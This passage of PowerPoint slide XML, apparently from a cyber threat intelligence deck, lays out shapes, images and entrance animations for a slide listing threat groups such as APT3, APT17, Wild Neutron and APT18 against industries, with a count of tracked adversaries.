                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3272749" y="6507541"/>
              <a:ext cx="1231618" cy="345212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914050"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dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>SCANDIUM</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2905993" y="1008273"/>
            <a:ext cx="1731340" cy="376684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Industry Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2949878" y="1399645"/>
            <a:ext cx="1672060" cy="1014841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A9D1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APT3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2951402" y="2519443"/>
            <a:ext cx="1670541" cy="1023126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A9D1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APT17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2962902" y="3647528"/>
            <a:ext cx="1670541" cy="1046733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A9D1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563">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wild Neutron</a:t>
            </a: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Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2959777" y="4775613"/>
            <a:ext cx="1670541" cy="1048239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A9D1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APT8, APT18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="607011" y="2525090"/>
            <a:ext cx="914270" cy="992591"/>
            <a:chOff x="815364" y="1333373"/>
            <a:chExt cx="914400" cy="992732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 43"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="815364" y="1333373"/>
              <a:ext cx="914400" cy="992732"/>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 name="Picture 44" descr="http://www.secureworks.com/Cyber_Threat_Intelligence.jp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17" y="1545806"/>
              <a:ext cx="587375" cy="5761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604269" y="3645990"/>
            <a:ext cx="914270" cy="1028652"/>
            <a:chOff x="815364" y="1333373"/>
            <a:chExt cx="914400" cy="992732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rectangle 46"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="815364" y="1333373"/>
              <a:ext cx="914400" cy="992732"/>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8" name="Picture 47" descr="http://www.secureworks.com/Cyber_Threat_Intelligence.jp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17" y="1545806"/>
              <a:ext cx="587375" cy="5761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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="604269" y="4788489"/>
            <a:ext cx="914270" cy="992591"/>
            <a:chOff x="815364" y="1333373"/>
            <a:chExt cx="914400" cy="992732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Rectangle 49"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="815364" y="1333373"/>
              <a:ext cx="914400" cy="992732"/>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1" name="Picture 50" descr="http://www.secureworks.com/Cyber_Threat_Intelligence.jp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017" y="1545806"/>
              <a:ext cx="587375" cy="576131"/>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Rectangle 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6924349" y="152533"/>
            <a:ext cx="4488573" cy="709653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="brightRoom" dir="tl"/>
          </a:scene3d>
          <a:sp3d contourW="9525" prstMaterial="flat">
            <a:bevelT w="0" h="0" prst="coolSlant"/>
            <a:contourClr>
              <a:srgbClr val="418AB3">
                <a:shade val="35000"/>
                <a:satMod val="130000"/>
              </a:srgbClr>
            </a:contourClr>
          </a:sp3d>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Targeted adversaries tracked in total</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rectangle 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5962403" y="150498"/>
            <a:ext cx="914270" cy="709653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="brightRoom" dir="tl"/>
          </a:scene3d>
          <a:sp3d contourW="9525" prstMaterial="flat">
            <a:bevelT w="0" h="0" prst="coolSlant"/>
            <a:contourClr>
              <a:srgbClr val="418AB3">
                <a:shade val="35000"/>
                <a:satMod val="130000"/>
              </a:srgbClr>
            </a:contourClr>
          </a:sp3d>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3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70</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Picture 61"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="2239" r="874" b="8602"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5101776" y="1174179"/>
            <a:ext cx="6477000" cy="3826713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 60"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5085468" y="2611775"/>
            <a:ext cx="7075431" cy="3387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546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iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>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9701" y="4018972"/>
            <a:ext cx="1637891" cy="793258"/>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047875" cy="2047875"/>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7875" y="0"/>
            <a:ext cx="2211388" cy="2137675"/>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263" y="0"/>
            <a:ext cx="2857500" cy="16002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6954" y="178897"/>
            <a:ext cx="1437299" cy="1492053"/>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7013" y="2623"/>
            <a:ext cx="2600325" cy="466725"/>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0400" y="453866"/>
            <a:ext cx="1733550" cy="314325"/>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26562" y="920591"/>
            <a:ext cx="2181225" cy="1123950"/>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44281" y="2147363"/>
            <a:ext cx="2419350" cy="990600"/>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74953" y="1852973"/>
            <a:ext cx="2238375" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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88424" y="2161227"/>
            <a:ext cx="2857500" cy="609600"/>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9384" y="3344672"/>
            <a:ext cx="2181225" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Pictur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28577" y="3284750"/>
            <a:ext cx="2857500" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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18534" y="3278187"/>
            <a:ext cx="2343150" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture 3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94141" y="3010842"/>
            <a:ext cx="1543050" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture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69648" y="3010842"/>
            <a:ext cx="1762125" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 4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64230" y="3011487"/>
            <a:ext cx="1371600" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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81" y="2128631"/>
            <a:ext cx="1914525" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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01421" y="4288355"/>
            <a:ext cx="2676525" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 4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895570" y="4278830"/>
            <a:ext cx="1276350" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 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88723" y="3489156"/>
            <a:ext cx="1300365" cy="619841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Picture 4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07938" y="4278830"/>
            <a:ext cx="2295525" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7EFC24D6-DB8F-6B44-BA5A-9BEC68C15CAA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle: Rounded Corners 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3953038"/>
            <a:ext cx="9326562" cy="1051969"/>
          </a:xfrm>
          <a:prstGeom prst="round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25"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="801574" y="573267"/>
            <a:ext cx="4068414" cy="5831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3554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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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0"/>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250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>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250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>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nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="1"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par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>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250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>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250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="56" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="59" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="62" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="63" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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par>
                          <p:cTn id="65" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="66" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="68" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetID="1" presetClass="entr" presetSubtype="0" fill="hold"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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="74" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="75" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="77" fill="hold">
